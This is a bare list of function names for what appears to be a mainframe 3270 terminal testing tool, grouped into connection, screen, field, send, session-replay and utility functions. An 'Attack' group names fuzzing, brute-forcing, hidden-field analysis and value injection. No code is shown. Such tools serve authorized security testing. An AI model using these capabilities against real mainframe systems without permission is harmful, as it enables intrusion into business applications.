Connection: connect_api, reconnect_api, ping, check_connection Screen: get_screen, get_screen_raw, get_screen_raw_hex, find_text, get_text_at Fields: analyze_screen_fields, get_input_fields, get_hidden_fields, analyze_hidden Send: send_enter, send_clear, send_aid_key, send_pf_key, send_command, send_field_data, send_raw_hex, build_and_send_packet Attack: fuzz_field, fuzz_all_input_fields, fuzz_transaction_codes, brute_force_field, scan_aid_keys, setup_injection, inject_value Session DB: load_database, get_logs, get_log_entry, replay_client_data, replay_sequence Utility: convert_ascii_to_ebcdic, convert_ebcdic_to_ascii, encode_buffer_address, decode_buffer_address, check_abend, wait_for_text, wait_for_screen_change